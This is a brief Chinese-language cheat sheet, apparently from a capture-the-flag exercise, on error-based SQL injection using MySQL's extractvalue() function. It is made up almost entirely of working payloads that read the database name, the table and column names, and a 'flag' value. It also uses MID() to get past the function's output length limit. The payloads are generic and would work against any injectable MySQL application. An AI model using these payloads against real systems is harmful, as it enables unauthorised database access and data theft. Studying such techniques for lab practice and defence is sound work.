查找库名
1 and extractvalue(1,concat(0x7e,database(),0x7e))
1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))
查找字段
1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))
查找数据
1 and extractvalue(1,concat(0x7e,(select flag from flag),0x7e))
只出现了一部分,这是extractvalue的弊端,只能显示一定数量的字符
引用函数
MID()
1 and extractvalue(1,concat(0x7e,mid((select flag from flag),1,16),0x7e))
1-16字符
1 and extractvalue(1,concat(0x7e,mid((select flag from flag),17),0x7e))